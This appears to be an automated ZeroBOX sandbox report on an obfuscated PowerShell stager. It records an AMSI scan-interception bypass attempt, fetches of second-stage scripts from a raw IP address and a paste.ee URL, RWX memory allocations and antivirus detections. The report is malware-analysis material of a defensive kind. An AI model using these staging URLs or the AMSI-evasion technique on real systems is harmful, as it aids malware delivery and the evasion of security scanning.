Summary | ZeroBOX

Magic_Stage.ps1

Generic Malware Antivirus .NET DLL DLL PE32 PE File
Category Machine Started Completed
FILE s1_win7_x6401 Sept. 18, 2023, 9:45 a.m. Sept. 18, 2023, 9:47 a.m.
Size 859.0B
Type ASCII text, with CRLF line terminators
MD5 3377b4e386b5ef09b80f96c3b121f9c8
SHA256 d295b2db5347e6873ef32f8db3663f601be989b67f6d743e100541ab80124d5b
CRC32 9B419D62
ssdeep 24:YcfpnFMCQgFwfqfpnFMLbfpnFMCQgA0f0FfpnFMCQgBwfn:YcfpEqfpkbfpJGfpJ+n
Yara None matched

Name Response Post-Analysis Lookup
paste.ee 104.21.84.67
IP Address Status Action
104.21.84.67 Active Moloch
164.124.101.2 Active Moloch
44.203.122.41 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49162 -> 44.203.122.41:80 2032162 ET INFO PS1 Powershell File Request Potentially Bad Traffic
TCP 192.168.56.101:49174 -> 104.21.84.67:443 2034978 ET POLICY Pastebin-style Service (paste .ee) in TLS SNI Potential Corporate Privacy Violation
TCP 192.168.56.101:49174 -> 104.21.84.67:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.101:49174
104.21.84.67:443
C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 CN=paste.ee cd:77:4c:26:1f:f8:63:15:43:5a:ba:aa:11:f1:e7:1a:23:3e:4b:15

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: AMSI providers' scan interception
console_handle: 0x0000001f
1 1 0

WriteConsoleW

buffer: -- Maor Korkos (@maorkor)
console_handle: 0x0000002f
1 1 0

WriteConsoleW

buffer: -- 64bit implemetation
console_handle: 0x0000003f
1 1 0

WriteConsoleW

buffer: Exception calling "AmsiInitialize" with "2" argument(s): "Unable to load DLL 'a
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: msi': The specified module could not be found. (Exception from HRESULT: 0x80070
console_handle: 0x0000002f
1 1 0

WriteConsoleW

buffer: 07E)"
console_handle: 0x0000003b
1 1 0

WriteConsoleW

buffer: At line:22 char:23
console_handle: 0x00000047
1 1 0

WriteConsoleW

buffer: + [Apis]::AmsiInitialize <<<< ("MyScanner", [ref]$ctx)
console_handle: 0x00000053
1 1 0

WriteConsoleW

buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x0000005f
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : DotNetMethodException
console_handle: 0x0000006b
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x04ff6530
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ae710
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004b6de0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004b6e60
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004b6ea0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004b6ee0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
ND_RI8+0xa7 ND_WI2-0x25 mscoree+0x1a36a @ 0x741ca36a
0x55613e9
system+0x131c68 @ 0x70b21c68
system+0x1318d0 @ 0x70b218d0
system+0x13136d @ 0x70b2136d
system+0x131277 @ 0x70b21277
system+0x130fda @ 0x70b20fda
system+0x130f91 @ 0x70b20f91
system+0x130a6f @ 0x70b20a6f
system+0x13091e @ 0x70b2091e
system+0x14c562 @ 0x70b3c562
system+0x19a8c2 @ 0x70b8a8c2
system+0x19a79e @ 0x70b8a79e
system+0x134ff1 @ 0x70b24ff1
system+0x4e97e7 @ 0x70ed97e7
microsoft+0x1214db @ 0x705b14db
system+0x152388 @ 0x70b42388
system+0x1a11a0 @ 0x70b911a0
system+0x18cfe5 @ 0x70b7cfe5
system+0x1984cd @ 0x70b884cd
system+0x193baf @ 0x70b83baf
system+0x19ac03 @ 0x70b8ac03
system+0x19a884 @ 0x70b8a884
system+0x19a79e @ 0x70b8a79e
system+0x134ff1 @ 0x70b24ff1
system+0x4e97e7 @ 0x70ed97e7
microsoft+0x1214db @ 0x705b14db
system+0x152388 @ 0x70b42388
system+0x1a11a0 @ 0x70b911a0
system+0x18cfe5 @ 0x70b7cfe5
system+0x1984cd @ 0x70b884cd
system+0x193baf @ 0x70b83baf
system+0x19ac03 @ 0x70b8ac03
system+0x19a884 @ 0x70b8a884
system+0x19a79e @ 0x70b8a79e
system+0x19a6b1 @ 0x70b8a6b1
system+0x19a4bf @ 0x70b8a4bf
system+0x198a79 @ 0x70b88a79
system+0x19861c @ 0x70b8861c
system+0x18d1fe @ 0x70b7d1fe
system+0x193c2f @ 0x70b83c2f
system+0x193b12 @ 0x70b83b12
system+0x18fe09 @ 0x70b7fe09
system+0x18f8c7 @ 0x70b7f8c7
mscorlib+0x216e76 @ 0x71fa6e76
mscorlib+0x2202ff @ 0x71fb02ff
mscorlib+0x216df4 @ 0x71fa6df4
CoUninitializeEE-0x29870 mscorwks+0x1b4c @ 0x72891b4c
CoUninitializeEE-0x125de mscorwks+0x18dde @ 0x728a8dde
CoUninitializeEE-0x4990 mscorwks+0x26a2c @ 0x728b6a2c
CoUninitializeEE-0x495d mscorwks+0x26a5f @ 0x728b6a5f
CoUninitializeEE-0x493f mscorwks+0x26a7d @ 0x728b6a7d
DllRegisterServerInternal+0x4cf2b GetPrivateContextsPerfCounters-0xa76e mscorwks+0xa3191 @ 0x72933191
CreateAssemblyNameObject+0xb7ec DllRegisterServerInternal-0x4937 mscorwks+0x5192f @ 0x728e192f
CreateAssemblyNameObject+0xb788 DllRegisterServerInternal-0x499b mscorwks+0x518cb @ 0x728e18cb
CreateAssemblyNameObject+0xb6ae DllRegisterServerInternal-0x4a75 mscorwks+0x517f1 @ 0x728e17f1
CreateAssemblyNameObject+0xb83a DllRegisterServerInternal-0x48e9 mscorwks+0x5197d @ 0x728e197d
DllRegisterServerInternal+0x4ccfc GetPrivateContextsPerfCounters-0xa99d mscorwks+0xa2f62 @ 0x72932f62
DllRegisterServerInternal+0x4cdd6 GetPrivateContextsPerfCounters-0xa8c3 mscorwks+0xa303c @ 0x7293303c
GetMetaDataInternalInterface+0xcf27 _CorDllMain-0x9ae mscorwks+0x16805a @ 0x729f805a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 04 11 8b 54 11 04 5d c2 08 00 55 8b ec 8b 4d
exception.instruction: mov eax, dword ptr [ecx + edx]
exception.exception_code: 0xc0000005
exception.symbol: ND_RI8+0x9 ND_WI2-0xb mscoreei+0x2175a
exception.address: 0x7332175a
registers.esp: 102230808
registers.edi: 49039436
registers.eax: 1932662609
registers.ebp: 102230808
registers.edx: 16
registers.ebx: 8310712
registers.esi: 1968968226
registers.ecx: 0
1 0 0
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://44.203.122.41/mini.ps1
suspicious_features GET method with no useragent header suspicious_request GET https://paste.ee/r/AqqN6/0
request GET http://44.203.122.41/mini.ps1
request GET https://paste.ee/r/AqqN6/0
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2540
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025db000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2540
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025ef000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2540
region_size: 327680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2540
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2540
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef30000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2540
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef30000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2540
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x021f9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2540
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05750000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2540
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a92000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2540
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025e9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2540
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06330000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2540
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06331000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2540
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05576000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2540
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05577000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2540
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05578000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2540
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05579000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2540
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0557a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2540
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x021fa000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2540
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a93000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2540
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05751000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2540
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06332000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2540
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a94000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2540
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06333000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2540
region_size: 1638400
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06880000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2540
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x069d0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2540
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x069d1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2540
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x069d2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2540
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x069d3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2540
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06334000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2540
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06335000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2540
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06336000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2540
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06337000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2540
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x021fd000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2540
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05561000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2540
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06338000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2712
region_size: 1703936
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01f10000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2712
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02070000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2804
region_size: 1507328
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01e80000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2804
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01fb0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file c:\Users\test22\AppData\Local\Temp\afgz_pv1.dll
file c:\Users\test22\AppData\Local\Temp\9mrxduhn.dll
file C:\Users\test22\AppData\Local\Temp\9mrxduhn.dll
file C:\Users\test22\AppData\Local\Temp\afgz_pv1.dll
ESET-NOD32 PowerShell/Obfuscated.AF
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Data received
HTTP/1.1 200 OK
Date: Mon, 18 Sep 2023 00:45:14 GMT
Server: Apache/2.4.55 (Win64) OpenSSL/1.1.1s
Upgrade: h2,h2c
Connection: Upgrade, Keep-Alive
Last-Modified: Mon, 24 Jul 2023 13:07:36 GMT
ETag: "264-6013b4c607aeb"
Accept-Ranges: bytes
Content-Length: 612
Keep-Alive: timeout=5, max=100

Add-Type -TypeDefinition @"
using System;
using System.Runtime.InteropServices;
public class Win32 {
    [DllImport("user32.dll")]
    public static extern void keybd_event(byte bVk, byte bScan, uint dwFlags, int dwExtraInfo);
}
"@

# Define VK_WIN constant
$VK_WIN = 0x5B

# Define VK_D constant
$VK_D = 0x44

# Define KEYEVENTF_KEYUP constant
$KEYEVENTF_KEYUP = 0x0002

# Press Win+D
[Win32]::keybd_event($VK_WIN, 0, 0, 0)
[Win32]::keybd_event($VK_D, 0, 0, 0)

# Release Win+D
[Win32]::keybd_event($VK_D, 0, $KEYEVENTF_KEYUP, 0)
[Win32]::keybd_event($VK_WIN, 0, $KEYEVENTF_KEYUP, 0)
Data received ˆ­vç-#ôڌnÓNOÆU5€êðÞ2c¡ƒüPÇO”Z[qÆø+@_vw²áKæ¿>óEß]/˜]R$ xÙë5"Ñd~R»ë9ò`BÚ³=Û# œ*;˜¦›Õ•‡½g®%êd{–3é5",ðŽHÙ˜£ æ@lȐl7°e`‰ˆ\ûÜGdã瀑_•'÷¯Ï:•è:DIëýULAʟNwÇ»êøÿ‚§‰N?ò­Róe¢mÓ-¹ Þ7Ûe%Go%@és•nÙwÜÁ66§ÊÒ+ÂáÀŽþ£ä»ýkaµWÜ(TçŒ$±‚ØúWݦÞ è§KÅGqwãš4 Ý+¿EåS‘’˜ÞÎ,&9W5fy! :ÙéÝm B”frëª6l+“¸âQ:TlW榓Xy|‡Ø©h—öç0#ê6Æp릳¬¨ ­Ùr•^£"Äד ±¦ ôŽe#­ÍÓ©±[³r´fî ã`ÌÎê–aï0gt*ÆT՗¥ˆ›ªÚ:,Àu…Kx«ù ~«X Dh“ÔyLFÒDšêóO„)ΞIë×wK¸B‹"Ê6Yn£rÙy-x¥ÜŠ ßrÞAõ˜3z,1Œ·éH2erƕ¼ /­sš£s_øœÌÿW&µž‘ö׃â»ð^"ƒõ?áȈœcúÓ¯.56(Ó%#ÎÃg’ð‰=P’‘.ÏÇ`NºÀº¼ß;”oÕGƆb™3 Ѽ33’¢sƒ”Õþõ›i’=ÿ O(,zgZ4Aq‰©¡²þÙ%œö)͵[w>¾æ"êi¿{¹]¢SÅ([MmáôÕc +› ïâ'ñ{ ÊD#o @×M³%Äøa‰âh·&\j7³ ð‚%­Z¢œË)ú)Rxíà‹!»W³å%î[ÏÕö 1³î¼ŠÎüìÒo´IJ¿»™äÛÆeñÜßÚh,Yp`Î?:`ÎaÛÀûêk›úÑè‰ïä`ˆ?Ó ŠÕÒ-õýmÚÖN—Ÿê ËúŠokÛς›)uCGpMu[[U~Á&N†µ_%yʒ ®Œ‹ïÂÛxµ{ú ŒÂrAä©ãÇôRGßa7 '&Z7 #Uã¼H¤w5=UâxÖx!g ›v;ã_|sö͘ÍU1ë¾û)+1¢íß'\;!1ò­Âï}iÍz@Ud+l‘΄LyŠA9 Hçâ=Z5©Ç‡Jv2½13Ç K@áÌÒ^)d@øŸáÀºl'‹T%Ðt6"ØGcÑöº’7ÂþM\šJ WoÊÑyÐTÑèØ¸sZàL(Õß—· ï*å„ãܵW5aßó8-€ìÙ%Wè8oSÆ0Ñû5·__™’íQïS‹Üa4,HXšÃ '҅‹¢ÂÚFä€Ø$ÇÄTÉÆËu§ÂÉYI÷["©äü!.¹Ó§Ä^ØA&·ézüãjÓ)÷Aä†l®i¸uÿiB¶¬A`ç¡ŠzœxI= ç֊- †¸Æ6ŸPáqzpéß ¸|ÈK8S#KÝ/™™ñàZµ…3ƒA™kB~Øyt¸l8¬Ö ìíï»M8¶ƒ¸³}ÿjR*(lþ¢Â™úãíì5ïTîöƺ5ÏĆ ÙðéÀèÔNo÷O'{;tçÄëzÛð4êã¿Û`a¸lFÙ=*:ò`aEì¾Çr„ˆTËå&½d‹<ËVŠ@‘ýº—ïÌëEÿ›™¬Nè ©05Yáˆ|l¼NÌJ‡o ¦¢u> ˜‰Ò ¿ø ‚çŠ^7M„§p¸ö’kjÈIq•þ%§!±3˜
Data received Ù$Nhoÿ¬þ\Êàh沇¢Ç+¾],YŽ½.Ÿî… β¶l =UFLè|- Bj$+¡©¸p]© XwŒÑ"ÃË%Y}£‚ãLc¾¬ˆõ"‰õ¥xȈÿä?P±»û˜™¨ 4?‡áåzY0¡ž Ø´¿™6áaVáÊÀZÏËWt>¦ÁæÃØYx•NE@Å}—‰}b8\3Ï<"M#^©áJíÖ*OsCíú蘉-Ϫ¥g‚ú›8•BLö΄ßʾÍÊÖÌZ´<ˆëPT3 '¹a4÷÷«z<”JmI¯UGFöái£Y›A‚—'K_2‚¢‘ÊٞíE6íäÉÌÎ1Cä]nx': >Pµq:»Yûéô{bÕÈãøÁW kÐU§£;%>ã:r´Oq¡·˜ò“Jý)Bº8Ïk¦on,”Æœ”Ñ]u āßØ¢½güöu8eêL“š“¾ƒX5V¨&5P7*ÎÔç#àð‘Uk÷iŸ%êk *p×Ý-“™M4Ý_IÒ;$Oxٓ¦žÿsÖJ¤;²0}kRIMä特Îi@®¦þPÑðw*›oʼnž_ÞpÌ6Ö }¸k­ ¸'=!°1t©º3»L:”ÍA?"” EĐa+§Wºz OÜ>4®ƒtô™.…««ž@‰œõ̃۬©¢· …•F‘uá¿ÿ5\ïí†Â(õFê¤Ý³t7¦dèÆþ |ér7y-Š¬Ò¤}¥Óg&ŠM#v*o*ÝãE”ð­ýˆ.øp|Ù²Ir…­³ÁaÚJ¢Ç¿’Ørq/™*dʾcл‚IÇt&êbo>§&Idm%{ˆÐ=ÂFnљ͉RäS•ü ¯ýyC‚g¨·#t;Iæ®Ðab+|GÔ^éHÚ&Zé!oh·W3âï-ý‡MªZ§vyÉËøÓL†Œ„è pGPd0ñE©r Éè"AA,!®'Ú[åâ×W)§ÆµSlä#¤AÝ–ó ¼„‘’L¦ù3U7±|­<ã/‚§Z@€9Wûñië_;QôøòpŽMÐÜÔÑÇXºýáoÔîx—ցxñZþ:m’ Y}º³¾£œË»Á(Qó“cdïB[»Wˆ[Ø vI@¿8´gùØ"GHgÆ-£šˆŽ€©3­G•Ž8ŽÌ +#ŠL÷BÃÁ8ÏÑç{µrñ–u7]ґ)Ðâ]/=ébš—Ž+¸R4pÎ.S݈ ܵ+®ò<|ëÀ”ÓÄl©ŽÈö·‘Fv›GgHwÜß9‚ëFÒ¬'ðþzÝq‚7äAO¤¼òd÷Þ´¢ÒšKð tÕVhÀ(¦¿´ø\Õv;˜AE‚m¶ðÈq +T~š m`¤Úàp4ß]š^Z ’kç0ä¯cld„zIònµä}°˜+Á‘Û<úªž{žÐúV¦ÚX`­êϳk¨ WÙKe¹Î‹‡ÿöºÖô§žÛÛ5èt€SöNB#jñu].<Vgйù:L ÉiÓvxiL“G>€¨‘ ¹¥…äUéû̌ŸÓt¬±Áÿ(+߶˜ö¨:HqüÑÛoŔeÌYRgKÃðoæà0¥x8ºWþ:tÓû{ìÒX80.žùeÊ«¨ÏQháßÙM&´ÍÑnúߏSOÆâéýUŠ0Ÿ¦ê„¹›åKuR~k‡!㷆K––)ßk¶'³8E+²F™ÝTøWba¨÷‹o»8†:n?s ‘ä“i¬E›¶bä®O6«Gjï©ål¡zæUú€gôUžâ±÷ª
Data received ‚M©Ï>„¯ó¸«õªݗ2™Ï0dbí-+Ø@tw¼èȓt…ˆÝì¹çÌËæØm)³¨§aÒmë|&b?¸˜Þ;d§‡V_÷‰¼ŽkÈ¿£FXá`㿔Ezu}ÜòÊ¢ß`¥×­vG/Pۀڙª=Ç/Äá)\]RÏö¿Uû\w ¶3É4Ì;Ü]¬Ó&¼ "3 …Qɑ¢ò úKÙÍr=aʱD¹»›ð‰ý™l¾/ý30~ƒ;õ&¦ÿŸç!Ô83t¥×ôyw1g›^î+£Úâ0y‹¥Õ˓]ȟ#׎J•óÖF¯¾²È-øàöö—¶¤Ž;JÓ÷ÏԒyåã”éiï9·)ƧæÂc0¢ëÝþæ!²½2, ¸4áɆF—áR¯Ð9ˆË>9ò2!¬ìÉ _çŒ1¶ ñÈ|©f -÷[BŒP´FP]˜Y¸«€ñ[øÓWÑsޞ"\H§Ê¯$ÁR¹öçt̶¾M,Ú':æÎx–¥jõùôçQÚOtãåùÛrªp¦"@ø“p^û`b߯ù2Wœ¾BÐi]bê\@Æo¿j9CîÁؓӞuÃÕe¾e‚7'O>™@ÞH"q¿û{4Ë*„]°¢ÿ¸=Ùÿó\óºÓ¦;ëtO‡x翚דÇÿ`üg ê Ã6‡Ì2ëËÀ_‰ñ™wÌgqLëžläËM6”šŸF\GRÐ;fF_üû=Ò+¸ESô¹¸©LÞø¼Æ®òý”¸M¤½§È͔]#Wuâ–é°Nw'«;x+º@ਠ2¥êh67Aˆ 'tðßNüd· RhY SFÍ!0qrÒgƒQ^CÅa€<)?À»`Šçž2™w+&³„…» >ƙpÉÃë^¤¡½§?¼rª)jB|“° ¢ˆ´Ï…èÑ.Ig?[!aD D÷™ém¿¹üȖý6¸÷ì(»“ðû“+ŽàuýH` üî#$e|â… f ³ÖVw¥‹ææïü’ÝÆvW·$6AT 踮xì'ýú$. óWO6Ü܉m£6GæÊÏÅmÿ }®t ¸›Hv5'4l–§÷%1s*Æn+wA4LùŠéÙwÜÌnÈ GyáàJez £’ªSù Û£'f·ºPص%úZ¸Xœê»×6[œ`@m­üL`É.s¿Ð3–W(èM§aVM±%cíøe¸41§ìð¡AèT³¹6¯—\Àa>Ð\*âwn«œ€ 